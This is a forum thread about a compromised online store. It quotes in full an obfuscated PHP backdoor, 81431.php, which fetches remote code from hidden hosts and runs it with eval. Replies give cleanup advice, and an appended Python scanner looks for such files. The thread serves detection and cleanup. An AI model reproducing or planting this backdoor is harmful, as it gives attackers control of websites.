Quote: Originally posted by gee38l
There is another file called: 81431.php

Code:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="1c9c141af20b84fdd184f973d11cd773") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
In the BMZ_CACHE folder I have a lot of folders, a - f and 0 - 9. I looked through every folder and it seems that most of them had a few php files similar to the two above.....

OK, this is what another software told me when I got some of those in our forum files... because usually they have some kind of redirection in them or links... they can get in by way of a disguised config file... hence the search for any php files that do not belong in with the image files or vice versa. So make sure you inspect all those files, because they are hack attempts.

What have you installed recently into your store? Check the zips that you got, because unless you did not manually install the items and someone else does your installing, then those were put up there by a would-be hacker.

The other software told me that any file with numbers like that, which you do not install yourself, is indeed a hack attempt, either by the contributor (which I am fairly certain this place does not allow or it would go the way of the dinos very fast) or by someone hacking the server files.

It is best to find out for certain, then download them all and delete them from the server...do this regardless.

Then keep an eye out to see if they reoccur. Talk to your host about these files also and please, change your password to get into the server files and the admin section.
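Added example, not part of either post: one way to run the inspection described above, a scan that lists every PHP file under an image-only directory such as BMZ_CACHE and notes which traits of the quoted 81431.php sample it shares. The function names and the demo tree are assumptions made for this illustration, and the demo files are constructed, harmless stand-ins.

```python
import os
import re
import tempfile

# Traits visible in the 81431.php sample quoted in this thread.
INDICATORS = {
    "eval": re.compile(rb"\beval\s*\("),
    "base64_decode": re.compile(rb"\bbase64_decode\s*\("),
    "dynamic_include": re.compile(rb"\b(?:include|require)(?:_once)?\s*\(\s*base64_decode"),
    "curl_exec": re.compile(rb"\bcurl_exec\s*\("),
    "error_reporting_off": re.compile(rb"error_reporting\s*\(\s*0\s*\)"),
}
PHP_EXT = (".php", ".phtml", ".php5", ".phar")
NUMERIC_NAME = re.compile(r"^\d+\.php$", re.IGNORECASE)

def scan_image_cache(root):
    """Return {relative_path: [reasons]} for every PHP file under an image-only directory."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue  # images and other cache files are not reported
            path = os.path.join(dirpath, name)
            reasons = ["php_in_image_dir"]  # no script belongs here at all
            if NUMERIC_NAME.match(name):
                reasons.append("numeric_filename")
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1_000_000)
            except OSError:
                data = b""  # unreadable: still reported as php_in_image_dir
            reasons += [k for k, rx in INDICATORS.items() if rx.search(data)]
            findings[os.path.relpath(path, root)] = reasons
    return findings

def demo():
    """Build a constructed cache tree with harmless stand-in files and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "a"))
        os.makedirs(os.path.join(root, "0"))
        with open(os.path.join(root, "a", "thumb.jpg"), "wb") as fh:
            fh.write(b"\xff\xd8\xff\xe0 constructed jpeg header")
        with open(os.path.join(root, "0", "81431.php"), "wb") as fh:
            fh.write(b'<? error_reporting(0); eval(base64_decode("")); ?>')
        return scan_image_cache(root)

if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(path, ", ".join(reasons))
```

Run it against a downloaded copy of the cache folder rather than the live site, and keep the flagged files as evidence for the host before deleting them from the server.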